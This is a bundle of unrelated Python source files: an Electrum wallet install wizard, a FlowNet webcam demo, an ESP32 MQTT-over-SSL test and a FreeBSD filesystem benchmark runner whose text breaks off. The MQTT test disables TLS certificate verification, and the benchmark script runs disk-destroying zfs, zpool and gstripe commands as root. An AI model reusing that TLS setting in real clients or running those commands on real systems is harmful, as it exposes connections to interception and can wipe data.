QWidget().setLayout(prior_layout)
self.main_widget.setLayout(layout)
self.cancel_button.setEnabled(True)
self.next_button.setEnabled(next_enabled)
self.main_widget.setVisible(True)
self.please_wait.setVisible(False)
result = self.loop.exec_()
if not result and raise_on_cancel:
raise UserCancelled
self.title.setVisible(False)
self.cancel_button.setEnabled(False)
self.next_button.setEnabled(False)
self.main_widget.setVisible(False)
self.please_wait.setVisible(True)
self.refresh_gui()
return result
def refresh_gui(self):
# For some reason, to refresh the GUI this needs to be called twice
self.app.processEvents()
self.app.processEvents()
def run(self, *args):
'''Wrap the base wizard implementation with try/except blocks
to give a sensible error message to the user.'''
wallet = None
try:
wallet = WizardBase.run(self, *args)
except UserCancelled:
self.print_error("wallet creation cancelled by user")
self.accept() # For when called from menu
except BaseException as e:
self.on_error(sys.exc_info())
raise
return wallet
def remove_from_recently_open(self, filename):
self.config.remove_from_recently_open(filename)
def request_seed(self, title, is_valid=None):
is_valid = is_valid or Wallet.is_any
slayout = SeedInputLayout()
def sanitized_seed():
return clean_text(slayout.seed_edit())
def set_enabled():
self.next_button.setEnabled(is_valid(sanitized_seed()))
slayout.seed_edit().textChanged.connect(set_enabled)
self.set_main_layout(slayout.layout(), title, next_enabled=False)
return sanitized_seed()
def show_seed(self, seed):
slayout = SeedWarningLayout(seed)
self.set_main_layout(slayout.layout())
def verify_seed(self, seed, is_valid=None):
while True:
r = self.request_seed(MSG_VERIFY_SEED, is_valid)
if prepare_seed(r) == prepare_seed(seed):
return
self.show_error(_('Incorrect seed'))
def show_and_verify_seed(self, seed, is_valid=None):
"""Show the user their seed. Ask them to re-enter it. Return
True on success."""
self.show_seed(seed)
self.app.clipboard().clear()
self.verify_seed(seed, is_valid)
def pw_layout(self, msg, kind):
playout = PasswordLayout(None, msg, kind, self.next_button)
self.set_main_layout(playout.layout())
return playout.new_password()
def request_passphrase(self, device_text, restore=True):
"""Request a passphrase for a wallet from the given device and
confirm it. restore is True if restoring a wallet. Should return
a unicode string."""
if restore:
msg = MSG_RESTORE_PASSPHRASE % device_text
return unicode(self.pw_layout(msg, PW_PASSPHRASE) or '')
def request_password(self, msg=None):
"""Request the user enter a new password and confirm it. Return
the password or None for no password."""
return self.pw_layout(msg or MSG_ENTER_PASSWORD, PW_NEW)
def show_restore(self, wallet, network):
# FIXME: these messages are shown after the install wizard is
# finished and the window closed. On MacOSX they appear parented
# with a re-appeared ghost install wizard window...
if network:
def task():
wallet.wait_until_synchronized()
if wallet.is_found():
msg = _("Recovery successful")
else:
msg = _("No transactions found for this seed")
self.emit(QtCore.SIGNAL('synchronized'), msg)
self.connect(self, QtCore.SIGNAL('synchronized'), self.show_message)
t = threading.Thread(target = task)
t.daemon = True
t.start()
else:
msg = _("This wallet was restored offline. It may "
"contain more addresses than displayed.")
self.show_message(msg)
def create_addresses(self, wallet):
def task():
wallet.synchronize()
self.emit(QtCore.SIGNAL('accept'))
t = threading.Thread(target = task)
t.start()
self.please_wait.setText(MSG_GENERATING_WAIT)
self.refresh_gui()
def query_create_or_restore(self, wallet_kinds):
"""Ask the user what they want to do, and which wallet kind.
wallet_kinds is an array of translated wallet descriptions.
Return a tuple (action, kind_index). Action is 'create' or
'restore', and kind the index of the wallet kind chosen."""
actions = [_("Create a new wallet"),
_("Restore a wallet or import keys")]
title = _("Electrum could not find an existing wallet.")
actions_clayout = ChoicesLayout(_("What do you want to do?"), actions)
wallet_clayout = ChoicesLayout(_("Wallet kind:"), wallet_kinds)
vbox = QVBoxLayout()
vbox.addLayout(actions_clayout.layout())
vbox.addLayout(wallet_clayout.layout())
self.set_main_layout(vbox, title)
action = ['create', 'restore'][actions_clayout.selected_index()]
return action, wallet_clayout.selected_index()
def query_hw_wallet_choice(self, msg, action, choices):
actions = [_("Initialize a new or wiped device"),
_("Use a device you have already set up"),
_("Restore Electrum wallet from device seed words")]
default_action = 1 if action == 'create' else 2
actions_clayout = ChoicesLayout(_("What do you want to do?"), actions,
checked_index=default_action)
wallet_clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout()
vbox.addLayout(actions_clayout.layout())
vbox.addLayout(wallet_clayout.layout())
self.set_main_layout(vbox)
self.next_button.setEnabled(len(choices) != 0)
if actions_clayout.selected_index() == 2:
action = 'restore'
else:
action = 'create'
return action, wallet_clayout.selected_index()
def request_many(self, n, xpub_hot=None):
vbox = QVBoxLayout()
scroll = QScrollArea()
scroll.setWidgetResizable(True)
scroll.setFrameShape(QFrame.NoFrame)
vbox.addWidget(scroll)
w = QWidget()
innerVbox = QVBoxLayout(w)
scroll.setWidget(w)
entries = []
if xpub_hot:
layout = SeedDisplayLayout(xpub_hot, title=MSG_SHOW_MPK, sid='hot')
else:
layout = SeedInputLayout(title=MSG_ENTER_SEED_OR_MPK, sid='hot')
entries.append(layout.seed_edit())
innerVbox.addLayout(layout.layout())
for i in range(n):
msg = MSG_COSIGNER % (i + 1) if xpub_hot else MSG_ENTER_SEED_OR_MPK
layout = SeedInputLayout(title=msg, sid='cold')
innerVbox.addLayout(layout.layout())
entries.append(layout.seed_edit())
def get_texts():
return [clean_text(entry) for entry in entries]
def set_enabled():
texts = get_texts()
is_valid = Wallet.is_xpub if xpub_hot else Wallet.is_any
all_valid = all(is_valid(text) for text in texts)
if xpub_hot:
texts.append(xpub_hot)
has_dups = len(set(texts)) < len(texts)
self.next_button.setEnabled(all_valid and not has_dups)
for e in entries:
e.textChanged.connect(set_enabled)
self.set_main_layout(vbox, next_enabled=False)
return get_texts()
def choose_server(self, network):
title = _("Electrum communicates with remote servers to get "
"information about your transactions and addresses. The "
"servers all fulfil the same purpose only differing in "
"hardware. In most cases you simply want to let Electrum "
"pick one at random. However if you prefer feel free to "
"select a server manually.")
choices = [_("Auto connect"), _("Select server manually")]
choices_title = _("How do you want to connect to a server? ")
clayout = ChoicesLayout(choices_title, choices)
self.set_main_layout(clayout.layout(), title)
auto_connect = True
if clayout.selected_index() == 1:
nlayout = NetworkChoiceLayout(network, self.config, wizard=True)
if self.set_main_layout(nlayout.layout(), raise_on_cancel=False):
nlayout.accept()
auto_connect = False
self.config.set_key('auto_connect', auto_connect, True)
network.auto_connect = auto_connect
def query_choice(self, msg, choices):
clayout = ChoicesLayout(msg, choices)
self.set_main_layout(clayout.layout(), next_enabled=bool(choices))
return clayout.selected_index()
def query_multisig(self, action):
cw = CosignWidget(2, 2)
m_edit = QSpinBox()
n_edit = QSpinBox()
m_edit.setValue(2)
n_edit.setValue(2)
n_edit.setMinimum(2)
n_edit.setMaximum(15)
m_edit.setMinimum(1)
m_edit.setMaximum(2)
n_edit.valueChanged.connect(m_edit.setMaximum)
n_edit.valueChanged.connect(cw.set_n)
m_edit.valueChanged.connect(cw.set_m)
hbox = QHBoxLayout()
hbox.addWidget(QLabel(_('Require')))
hbox.addWidget(m_edit)
hbox.addWidget(QLabel(_('of')))
hbox.addWidget(n_edit)
hbox.addWidget(QLabel(_('signatures')))
hbox.addStretch(1)
vbox = QVBoxLayout()
vbox.addWidget(cw)
vbox.addWidget(WWLabel(_("Choose the number of signatures needed "
"to unlock funds in your wallet:")))
vbox.addLayout(hbox)
self.set_main_layout(vbox, _("Multi-Signature Wallet"))
m = int(m_edit.value())
n = int(n_edit.value())
wallet_type = '%dof%d'%(m,n)
return wallet_type
|
demo_local.py
|
# -*- coding: utf-8 -*-
# Copyright 2018 The Blueoil Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
import os
import sys
import cv2
import time
import math
import click
import imghdr
import imageio
import argparse
import threading
import collections
import numpy as np
import tensorflow as tf
from tensorflow.summary import FileWriter
from tensorflow.python.framework import graph_util
from .flownet_s import FlowNetS
from ..net import Mode
from ..training_schedules import LONG_SCHEDULE
from ..flow_to_image import flow_to_image, color_function
# from ..flowlib import flow_to_image
parser = argparse.ArgumentParser()
parser.add_argument('--restore_path', type=str, required=True)
args = parser.parse_args()
def init_camera(camera_height, camera_width, device_id=0):
cap = cv2.VideoCapture(device_id)
cap.set(cv2.CAP_PROP_FRAME_WIDTH, camera_width)
cap.set(cv2.CAP_PROP_FRAME_HEIGHT, camera_height)
cap.set(cv2.CAP_PROP_FPS, 10)
return cap
def rescale_frame(frame, ratio):
height = int(frame.shape[0] * ratio)
width = int(frame.shape[1] * ratio)
shape = (width, height)
return cv2.resize(frame, shape, interpolation=cv2.INTER_AREA)
if __name__ == '__main__':
# import matplotlib.pyplot as plt
# cmap = np.tile(np.linspace(0, 2 * np.pi, 1001), (1001, 1))
# plt.imshow(color_function(cmap).astype(np.uint8))
# plt.show()
# initializing camera
cap = init_camera(480, 640, 0)
# initializing worker and variables
diff_step = 10
frame_list = collections.deque(maxlen=300)
image_size = (384, 512, 3)
input_image = np.zeros(
(1, *image_size[:2], image_size[-1] * 2)).astype(np.uint8)
output_flow = np.zeros((1, *image_size[:2], 2))
output_image = np.zeros(image_size).astype(np.uint8)
for _ in range(diff_step):
frame_list.append(np.zeros(image_size).astype(np.uint8))
def _get_frame():
while True:
begin = time.time()
res, frame = cap.read()
assert res, "Something wrong occurs with camera!"
frame_list.append(rescale_frame(frame[:, ::-1, :], 0.8))
time.sleep(max(0.0, 1.0 / 30 - (time.time() - begin)))
# Create a new network
graph = tf.Graph()
with graph.as_default():
model = FlowNetS(mode=Mode.TEST)
training_schedule = LONG_SCHEDULE
images_placeholder, _ = model.placeholders()
input_op = {
'input_a': images_placeholder[..., :3],
'input_b': images_placeholder[..., 3:],
}
predictions = model.model(input_op, training_schedule)
output_op = predictions['flow']
init_op = tf.global_variables_initializer()
saver = tf.train.Saver()
session_config = tf.ConfigProto()
session_config.gpu_options.allow_growth = True
sess = tf.Session(graph=graph, config=session_config)
sess.run(init_op)
saver.restore(sess, args.restore_path)
def _inference():
time_list = collections.deque(maxlen=10)
while True:
begin = time.time()
input_image[0, ..., :3] = frame_list[-diff_step]
input_image[0, ..., 3:] = frame_list[-1]
feed_dict = {images_placeholder: input_image / 255.0}
output_flow[:] = sess.run(output_op, feed_dict=feed_dict)
output_image[:] = flow_to_image(-output_flow[0][..., [1, 0]])
time_list.append(time.time() - begin)
print("\033[KFPS: {:.3f}".format(
np.mean(1 / np.array(time_list))), end="\r")
t1 = threading.Thread(target=_get_frame)
t1.setDaemon(True)
t2 = threading.Thread(target=_inference)
t2.setDaemon(True)
t1.start()
t2.start()
while True:
# cv2.imshow("raw", input_image[0, ..., :3])
cv2.imshow("comp", np.mean([
input_image[0, ..., :3],
input_image[0, ..., 3:]], axis=0).astype(np.uint8))
        _pre = frame_list[-diff_step].astype(np.float64)
        _post = frame_list[-1].astype(np.float64)
diff = np.mean([_pre, _post], axis=0).astype(np.uint8)
# diff = np.mean(
# list(frame_list)[::-diff_step][:10], axis=0).astype(np.uint8)
# output_image_overwrap = np.mean(
# [input_image[0, ..., 3:], output_image], axis=0).astype(np.uint8)
cv2.imshow("diff", diff)
cv2.imshow("output", output_image)
key = cv2.waitKey(2)
if key == 27:
# imageio.imsave("../test.png", output_image)
break
|
mqtt_ssl_example_test.py
|
from __future__ import print_function
from __future__ import unicode_literals
from builtins import str
import re
import os
import sys
import ssl
import paho.mqtt.client as mqtt
from threading import Thread, Event
from tiny_test_fw import DUT
import ttfw_idf
event_client_connected = Event()
event_stop_client = Event()
event_client_received_correct = Event()
event_client_received_binary = Event()
message_log = ""
# The callback for when the client receives a CONNACK response from the server.
def on_connect(client, userdata, flags, rc):
print("Connected with result code " + str(rc))
event_client_connected.set()
client.subscribe("/topic/qos0")
def mqtt_client_task(client):
while not event_stop_client.is_set():
client.loop()
# The callback for when a PUBLISH message is received from the server.
def on_message(client, userdata, msg):
global message_log
global event_client_received_correct
global event_client_received_binary
if msg.topic == '/topic/binary':
binary, bin_size = userdata
print('Receiving binary from esp and comparing with {}, size {}...'.format(binary, bin_size))
with open(binary, 'rb') as f:
bin = f.read()
if bin[:bin_size] == msg.payload[:bin_size]:
print('...matches!')
event_client_received_binary.set()
return
recv_binary = binary + '.received'
        with open(recv_binary, 'wb') as fw:
fw.write(msg.payload)
raise ValueError('Received binary (saved as: {}) does not match the original file: {}'.format(recv_binary, binary))
payload = msg.payload.decode()
if not event_client_received_correct.is_set() and payload == "data":
client.subscribe("/topic/binary")
client.publish("/topic/qos0", "send binary please")
if msg.topic == "/topic/qos0" and payload == "data":
event_client_received_correct.set()
message_log += "Received data:" + msg.topic + " " + payload + "\n"
@ttfw_idf.idf_example_test(env_tag="Example_WIFI")
def test_examples_protocol_mqtt_ssl(env, extra_data):
broker_url = ""
broker_port = 0
"""
steps:
1. join AP and connects to ssl broker
2. Test connects a client to the same broker
3. Test evaluates python client received correct qos0 message
4. Test ESP32 client received correct qos0 message
5. Test python client receives binary data from running partition and compares it with the binary
"""
dut1 = env.get_dut("mqtt_ssl", "examples/protocols/mqtt/ssl", dut_class=ttfw_idf.ESP32DUT)
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, "mqtt_ssl.bin")
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance("mqtt_ssl_bin_size", "{}KB"
.format(bin_size // 1024))
ttfw_idf.check_performance("mqtt_ssl_size", bin_size // 1024, dut1.TARGET)
# Look for host:port in sdkconfig
try:
value = re.search(r'\:\/\/([^:]+)\:([0-9]+)', dut1.app.get_sdkconfig()["CONFIG_BROKER_URI"])
broker_url = value.group(1)
broker_port = int(value.group(2))
bin_size = min(int(dut1.app.get_sdkconfig()['CONFIG_BROKER_BIN_SIZE_TO_SEND']), bin_size)
except Exception:
print('ENV_TEST_FAILURE: Cannot find broker url in sdkconfig')
raise
client = None
# 1. Test connects to a broker
try:
client = mqtt.Client()
client.on_connect = on_connect
client.on_message = on_message
client.user_data_set((binary_file, bin_size))
client.tls_set(None,
None,
None, cert_reqs=ssl.CERT_NONE, tls_version=ssl.PROTOCOL_TLSv1_2, ciphers=None)
client.tls_insecure_set(True)
print("Connecting...")
client.connect(broker_url, broker_port, 60)
except Exception:
print("ENV_TEST_FAILURE: Unexpected error while connecting to broker {}: {}:".format(broker_url, sys.exc_info()[0]))
raise
# Starting a py-client in a separate thread
thread1 = Thread(target=mqtt_client_task, args=(client,))
thread1.start()
try:
print("Connecting py-client to broker {}:{}...".format(broker_url, broker_port))
if not event_client_connected.wait(timeout=30):
raise ValueError("ENV_TEST_FAILURE: Test script cannot connect to broker: {}".format(broker_url))
dut1.start_app()
try:
ip_address = dut1.expect(re.compile(r" sta ip: ([^,]+),"), timeout=30)
print("Connected to AP with IP: {}".format(ip_address))
except DUT.ExpectTimeout:
print('ENV_TEST_FAILURE: Cannot connect to AP')
raise
print("Checking py-client received msg published from esp...")
if not event_client_received_correct.wait(timeout=30):
raise ValueError('Wrong data received, msg log: {}'.format(message_log))
print("Checking esp-client received msg published from py-client...")
dut1.expect(re.compile(r"DATA=send binary please"), timeout=30)
print("Receiving binary data from running partition...")
if not event_client_received_binary.wait(timeout=30):
raise ValueError('Binary not received within timeout')
finally:
event_stop_client.set()
thread1.join()
if __name__ == '__main__':
test_examples_protocol_mqtt_ssl()
|
run.py
|
#!/usr/bin/env python3
import configargparse
import subprocess
import os
import pwd
import threading
import shutil
import errno
import select
import urllib
import json
import time
import http.server
import socketserver
import sys
import random
import datetime
from enum import Enum
from os import path
from os import listdir
from os.path import isfile, join
from pwd import getpwnam
from pathlib import Path
# Needed for benchmarking Firefox
from selenium.webdriver import Firefox, FirefoxProfile
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
from selenium.webdriver.firefox.options import Options
from selenium.webdriver.support import expected_conditions as expected
from selenium.webdriver.support.wait import WebDriverWait
# Captured output can be disabled (None), capture a single command in which only one file is needed
# or multiple commands in case a directory is needed to store the output
class CapturedOut(Enum):
NONE = 0
SINGLE = 1
MULTI = 2
# ====== PARSER CONFIGURATION ======
# Set the arguments for mounting a filesystem for benchmarking/use
def set_defaults_mount(p):
p.add('--disks', metavar='d1,d2,etc', required=True, action="append",
help='Comma separated values of disk devices')
p.add(
'--stripe',
required=True,
help='Size of stripe of geom layer in bytes')
p.add('--type', required=True, metavar='n',
help='Type of filesystem to benchmark (or memory)',
choices=['slos', 'zfs', 'ffs', 'memory'])
p.add('--mountdir', required=True, metavar='md',
help='Directory to mount onto')
p.add('--stripename', required=True, metavar='n',
help='name of stripe device')
# Set the defaults for the SLS module
def set_defaults_sls(p):
p.add('--slsperiod', required=True, metavar='slsperiod',
help="SLS checkpointing period in milliseconds (0 for one checkpoint)")
p.add('--oid', required=True, metavar='oid',
help="SLS partition OID")
p.add('--delta', default=True, required=False, metavar='delta',
help="SLS delta checkpointing")
p.add('--recursive', default=True, required=False, metavar='recursive',
help="SLS checkpoints all descendants of processes")
p.add('--slsctl', required=True, metavar='slsctl',
help='Path to the slsctl tool')
p.add('--clients', metavar='h1,h2,etc', required=True, action="append",
help='Comma separated values of client hosts')
p.add('--ignore_unlinked', metavar='ignore_unlinked', required=False, default=True, action="store",
help='Ignore unlinked files when checkpointed')
# Set the defaults for the SLOS module
def set_defaults_slos(p):
p.add('--checksum', default=False, action="store_true",
help="Checksumming on")
p.add('--compress', default=False, action="store_true",
help="Turn on compress")
p.add_argument('--withgstat', required=False, action='store_true',
help="Capture gstat")
p.add('--checkpointtime', required=True, metavar='checkpointtime',
help="Number of ms between SLOS checkpoints")
def set_defaults_bench(p):
p.add('--benchaddr', required=False, metavar='benchaddr',
help="Address on which the benchmark server runs")
p.add('--benchport', required=False, metavar='benchport',
help="Address on which the benchmark port runs")
p.add('--sshaddr', required=False, metavar='sshaddr',
help="Address of benchmarking client")
p.add('--sshport', required=False, metavar='sshport',
help="Port of benchmarking client")
p.add('--sshkey', required=True, metavar='sshkey',
help='Key used for sshing into remotes')
p.add('--sshuser', required=True, metavar='sshuser',
help='Remote user name for sshing into for benchmarks')
def set_defaults_stats(p):
p.add('--runno', required=False, metavar='runno', default='0',
help='Run number')
p.add('--runstart', required=False, metavar='runstart', default='0',
help='Beginning of run')
p.add('--runend', required=False, metavar='runend', default='0',
help='End of run')
p.add('--ckpt_done', required=False, metavar='ckpt_done', default='0',
help='Checkpoints successfully done')
p.add('--ckpt_attempted', required=False, metavar='ckpt_attempted',
default='0', help='Checkpoints attempted')
p.add('--slsfreq', required=False, metavar='slsfreq',
default='0', help='slsfreq')
def set_defaults(p):
p.add('-c', '--config', required=False, is_config_file=True,
help='Path to config')
p.add('--slsmodule', required=True, metavar='sls',
help='Path to sls module')
p.add('--slosmodule', required=True,
metavar='slos', help='Path to slos module')
p.add('--newfs', required=True, metavar='newfs', help='Path to newfs tool')
p.add('--runs', default=1, type=int, required=False, help="Number of runs")
p.add('--nounload', default=False, action="store_true",
required=False, help="Unload after benchmark")
set_defaults_mount(p)
set_defaults_sls(p)
set_defaults_slos(p)
set_defaults_bench(p)
set_defaults_stats(p)
# Wrapper for print_help() that drops all arguments
def help_msg(options):
parser.print_help()
# Define the parsers.
parser = configargparse.ArgParser(add_help=True)
parser.set_defaults(func=help_msg)
subparser = parser.add_subparsers(parser_class=configargparse.ArgParser)
# Build a new command for running a benchmark.
def Command(captureOut=CapturedOut.NONE, required=[], help="", add_args=[]):
def real(func):
# A global parser imported by the module
global parser
global subparser
# Unpacks the arguments to the function
def wrapper(*args, **kwargs):
func(*args, **kwargs)
name = func.__name__
h = help
if len(required) > 0 and h == "":
raise Exception(
"Please add a help message for the command {}" % name)
elif h == "":
h = "No extra arguments required"
# New parser just for this command
p = subparser.add_parser(name, help=h,
default_config_files=['benchmarks/sls.conf'])
set_defaults(p)
# Add default names for the output file/directory if needed
if captureOut == CapturedOut.SINGLE:
p.add('-o', required=False, metavar='f.out',
help='File to capture command output')
elif captureOut == CapturedOut.MULTI:
p.add('-o', required=False, metavar='dirout',
help='Directory to capture command output')
# Add any more configuration options needed.
for x in required:
p.add_argument(x)
for x in add_args:
p.add(*x[0], **x[1])
# The function to be actually executed
p.set_defaults(func=func)
return wrapper
return real
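# Usage sketch (an assumption about how the decorator is driven, not part of
# the original script): a benchmark command is declared by decorating a
# function that takes the parsed options, e.g.
#
#   @Command(captureOut=CapturedOut.SINGLE, required=["script"],
#            help="filebench script as extra arg")
#   def benchmark(options):
#       ...
#
# This registers a "benchmark" subcommand whose extra positional argument is
# "script" and which accepts "-o" for its output file, so it would be invoked
# as something like:
#
#   ./run.py benchmark myworkload.f -o results.out
#
# with the remaining required options (modules, disks, mountdir, SSH settings,
# and so on) supplied through the default config file benchmarks/sls.conf.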
# ====== BASIC SHELL COMMANDS ======
def numhosts(options):
return len(options.clients)
# Construct an SSH command for logging into a remote.
def sshcmd(options, host=-1):
sshaddr = options.sshaddr
if host != -1:
sshaddr = options.clients[host]
return ["ssh", "-i", options.sshkey, "-p", options.sshport,
"{}@{}".format(options.sshuser, options.sshaddr)]
# Run a bash command
def bashcmd(lst, fail_okay=False):
if fail_okay:
# Propagate the return code upwards
ret = subprocess.run(lst)
return ret.returncode
else:
# Throw an exception if there was an error
subprocess.run(lst).check_returncode()
return 0
def ycsbcmd(options, cmd, dbname):
basecmd = ["{}/{}".format(options.ycsb, "bin/ycsb.sh"), cmd, dbname, "-P",
"{}/workloads/{}".format(options.ycsb, options.workload), "-p",
"{}.host={}".format(dbname, options.benchaddr),
"-p", "{}.port={}".format(dbname, options.benchport),
"-p", "recordcount={}".format(options.recordcount)]
if cmd == "run":
basecmd.extend(["-threads", options.ycsbthreads, "-p",
"operationcount={}".format(options.operationcount)])
return basecmd
def mutilatecmd(options, *args):
return ["{}".format(options.mutilate),
"-s",
"{}:{}".format(options.benchaddr, options.benchport)] + list(args)
# Do a sysctl into the system
def sysctl(module, key, value):
if value is None:
return subprocess.run(["sysctl", "-n", "{}.{}".format(module, key)],
check=True,
stdout=subprocess.PIPE).stdout.decode('UTF-8').rstrip()
else:
bashcmd(["sysctl", "{}.{}={}".format(module, key, value)])
return None
def sysctl_slos(key, value=None):
return sysctl("aurora_slos", key, value)
def sysctl_sls(key, value=None):
return sysctl("aurora", key, value)
def kldload(path):
kldl = ["kldload", path]
return bashcmd(kldl, fail_okay=True)
def kldunload(path):
kldl = ["kldunload", path]
return bashcmd(kldl, fail_okay=True)
# Create the full path of the disk by prefixing its name.
def prefixdisk(options):
# Different prefixes for striped and non-striped disks
if len(options.disks) == 1:
return "/dev/{}".format(options.stripename)
else:
return "/dev/stripe/{}".format(options.stripename)
def mount(options):
# Different prefixes for striped and non-striped disks
path = prefixdisk(options)
if (options.type in ["slos", "memory"]):
cmd = ["mount", "-t", "slsfs", path, options.mountdir]
elif (options.type == "zfs"):
cmd = ["zfs", "set", "mountpoint={}".format(
options.mountdir), "{}{}".format(options.stripename, options.mountdir)]
elif (options.type == "ffs"):
cmd = ["mount", path, options.mountdir]
bashcmd(cmd)
os.chmod(options.mountdir, 0o777)
def umount(options):
if (options.type == "zfs"):
cmd = ["zfs", "destroy", "-r",
"{}{}".format(options.stripename, options.mountdir)]
bashcmd(cmd)
cmd = ["zpool", "destroy", options.stripename]
bashcmd(cmd)
else:
cmd = ["umount", options.mountdir]
bashcmd(cmd, fail_okay=True)
# Return the disk we'll use for the SLOS. If it's a geom stripe, create it.
def geom_init(options, disks, stripe):
if (options.type != "zfs"):
# Gstripe does not work with 1 disk
if len(disks) == 1:
options.stripename = disks[0]
return
create = ["gstripe", "create", "-s", stripe, "-v", options.stripename]
create.extend(disks)
destroy_geom = ["gstripe", "destroy", options.stripename]
# XXX Error checking? We have fail_okay
bashcmd(destroy_geom, fail_okay=True)
bashcmd(create, fail_okay=True)
bashcmd(destroy_geom, fail_okay=True)
if (bashcmd(create, fail_okay=True)):
print("\nERROR: Problem with loading gstripe\n")
unload(options)
exit(1)
# Create a new filesystem. This can be a regular filesystem or a SLOS
def newfs(options):
path = prefixdisk(options)
if (options.type in ["slos", "memory"]):
newf = [options.newfs, path]
bashcmd(newf)
elif (options.type == "ffs"):
newf = ["newfs", "-j", "-S", "4096", "-b", options.stripe, path]
bashcmd(newf)
elif (options.type == "zfs"):
zpool = ["zpool", "create", options.stripename]
zpool.extend(options.disks)
bashcmd(zpool)
if (options.compress):
zpool = ["zfs", "set", "compression=lz4", options.stripename]
bashcmd(zpool)
if (options.checksum):
zpool = ["zfs", "set", "checksum=on", options.stripename]
bashcmd(zpool)
else:
zpool = ["zfs", "set", "checksum=off", options.stripename]
bashcmd(zpool)
zpool = ["zfs", "set", "recordsize={}".format(options.stripe),
options.stripename]
bashcmd(zpool)
zpool = ["zfs", "create", "{}{}".format(
options.stripename, options.mountdir)]
bashcmd(zpool)
else:
raise Exception("Invalid backend {} specified".format(options.type))
# Set up all modules and filesystems.
def module_init(options):
if (options.type != "zfs"):
geom_init(options, options.disks, options.stripe)
if (options.type in ["slos", "memory"]):
if kldload(options.slosmodule):
raise Exception("SLOS module already loaded")
if kldload(options.slsmodule):
raise Exception("SLS module already loaded")
sysctl_slos("checkpointtime", options.slsperiod)
newfs(options)
mount(options)
# Clean up for the work done in module_init().
def module_fini(options):
# Needed because some benchmarks keep dumping even after they're
# supposedly done.
cmd = ['pkill', '-SIGTERM', 'dtrace']
bashcmd(cmd, fail_okay=True)
time.sleep(5)
umount(options)
if (options.type in ["slos", "memory"]):
kldunload("slos.ko")
kldunload("sls.ko")
if (options.type != "zfs"):
destroy_geom = ["gstripe", "destroy", options.stripename]
bashcmd(destroy_geom, fail_okay=True)
# ===== SLOS BENCHMARKING COMMANDS =====
# Check if the stripe already exists
def stripe_loaded(options):
return path.exists("/dev/stripe/{}".format(options.stripename))
def get_num_snaps(options):
if (options.type == "slos"):
cmd = ["../tools/fsdb/fsdb", "-s",
"/dev/stripe/{}".format(options.stripename)]
result = subprocess.run(cmd, stdout=subprocess.PIPE)
return int(result.stdout.decode('utf-8'))
else:
return 0
def gstat(name, timeout, path):
cmd = ["timeout", str(timeout), "gstat", "-C", "-f", name]
out = open(path, "w+")
subprocess.run(cmd, stdout=out)
out.close()
def startgstat(name, timeout, path):
x = threading.Thread(target=gstat, args=(name, timeout, path,))
x.start()
return x
def runbench(options, path, output):
cmd = ["filebench", "-f", path]
gthread = None
if output != "":
stdout = open(output, 'w+')
else:
stdout = None
snap = get_num_snaps(options)
if (options.withgstat and output != ""):
path = "{}.gstat.csv".format(output)
gthread = startgstat(options.stripename, 40, path)
subprocess.run(cmd, stdout=stdout)
if (output != ""):
stdout.close()
c = "fb-post.sh"
cmd = [c, output]
subprocess.run(cmd)
stdout = open(output, 'a+')
snap = get_num_snaps(options) - snap
stdout.write(str(snap))
stdout.close()
if (gthread):
gthread.join(timeout=25)
else:
snap = get_num_snaps(options) - snap
print("CHECKPOINTS COMPLETED {}".format(str(snap)))
@Command()
def load(options):
# XXX Why is having a stripe equivalent to having everything loaded?
if stripe_loaded(options):
print("Already loaded. Unload first to reload")
exit(1)
else:
module_init(options)
print("Loaded..")
@Command()
def unload(options):
if (options.nounload):
print("Unloading not permitted")
return
module_fini(options)
print("Unloaded..")
@Command(captureOut=CapturedOut.SINGLE,
required=["script"], help="filebench script as extra arg")
def benchmark(options):
if stripe_loaded(options):
print("Already loaded. Unload first to runbenchmark")
return
load(options)
outpath = ""
if options.o is not None:
outpath = options.o
runbench(options, options.script, outpath)
unload(options)
@Command(required=["dir"], captureOut=CapturedOut.MULTI,
help="script directory as extra arg")
def allbenchmarks(options):
if stripe_loaded(options):
print("Already loaded. Unload first to runbenchmark")
files = [f for f in listdir(options.dir) if isfile(join(options.dir, f))]
out = options.o
for x in range(0, int(options.runs)):
print("===== Run %s ======" % str(x))
if out:
outdir = out + "/" + str(x) + "/"
try:
os.mkdir(outdir)
os.chmod(outdir, 0o777)
except BaseException:
pass
else:
outdir = ""
for i, file in enumerate(files):
print("======= Running %s ======" % file)
print("======= [%s of %s] ======" % (i + 1, len(files)))
fullpath = options.dir + "/" + file
output = ""
if outdir:
output = outdir + "/" + file + ".out"
load(options)
runbench(options, fullpath, output)
unload(options)
@Command(required=["script", "min", "max", "steps"], captureOut=CapturedOut.MULTI,
help="Time series")
def series(options):
max = int(options.max)
min = int(options.min)
if stripe_loaded(options):
print("Already loaded. Unload first to runbenchmark")
return
for x in range(0, int(options.steps)):
value = min + (((max - min) * x) // (int(options.steps) - 1))
print("======= Running Step %s ======" % value)
options.checkps = value
        output = ""
        if options.o:
            output = "{}/{}.out".format(options.o, value)
load(options)
runbench(options, options.script, output)
unload(options)
@Command(required=["script", "min", "max", "steps"],
captureOut=CapturedOut.MULTI,
help="Time series")
def allseries(options):
outputdir = options.o
dir = options.script
files = [f for f in listdir(dir) if isfile(join(dir, f))]
for x in range(0, options.runs):
print("===== Run %s ======" % str(x))
        if outputdir:
outdir = outputdir + "/" + str(x) + "/"
try:
os.mkdir(outdir)
os.chmod(outdir, 0o777)
except BaseException:
pass
else:
outdir = ""
for file in files:
if (outdir != ""):
path = "{}/{}".format(outdir, file)
try:
os.mkdir(path)
os.chmod(path, 0o777)
except BaseException:
pass
options.o = path
options.script = "{}/{}".format(dir, file)
print("======= Running File %s ======" % file)
series(options)
# ===== SLS BENCHMARKS =====
# Get the PID of the main process we're checkpointing. Benchmarks often have
# multiple processes, so we need to get the root of its process tree, assuming
# it exists. Note that we can only do this if we assume non-random PIDs, and
# even then PID allocation must not wrap around.
def pid_main(benchname):
cmd = ["pidof", benchname]
output = subprocess.run(cmd, check=True,
